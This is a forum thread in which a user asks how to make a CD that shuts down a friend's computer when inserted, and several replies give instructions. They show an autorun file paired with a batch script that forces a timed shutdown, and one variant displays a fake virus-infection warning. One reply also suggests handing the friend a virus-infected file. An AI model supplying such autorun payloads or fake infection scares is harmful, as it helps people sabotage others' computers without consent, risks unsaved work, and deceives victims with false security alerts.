Thread: Create cd that Shutdown the Computer if used

Create cd that Shutdown the Computer if used

Hi, I want to create cd which when played on computer, the computer will shutdown automatically. One of my friend making me too bore for softwares all the time and I want to give him that so, that he will never ask for me any software and other material. So, help me.

Re: Create cd that Shutdown the Computer if used

Hi, I don't think that this is possible with the help of any cd or something. And tell that friend directly that you are not interested to give him any material or something so, he will not ask for it to you. I am not having anything regarding this. If I am able to find it, I will post it to you. I think you need to use any virus infected file, so he never ask you for anything from your computer.

Hi, you can create cd that shutdown the computer if used with the following trick, try it. While writing the cd just use following. Open two notepad files One and Two respectively. Into the One type "open=shutdown.bat" and save it with the extention of .ini. Now open Two and type
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 200 and save it with the extention of .bat.
    Now save these files to the cd and burn it. You have done what you want.

Hi, you want to create cd that will shutdown the computer if used then you just need to create one bat file and then just save that bat file into the cd by adding it while burning.

Code:
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 600 -c "Some of the files of your Computer has been Infected by w32.mali and needs to shut down"
    Now before computer shut down it will show the message of "Some of the files of your Computer has been Infected by w32.mali and needs to shut down".

pritamsingh98 Guest

Quote Originally Posted by FlashX View Post
    Hi, you can create cd that shutdown the computer if used with the following trick, try it. While writing the cd just use following. Open two notepad files One and Two respectively. Into the One type "open=shutdown.bat" and save it with the extention of .ini. Now open Two and type
    @echo off
    C:\WINDOWS\system32\shutdown.exe -s -f -t 200 and save it with the extention of .bat.
    Now save these files to the cd and burn it. You have done what you want.
    hey thanx useful information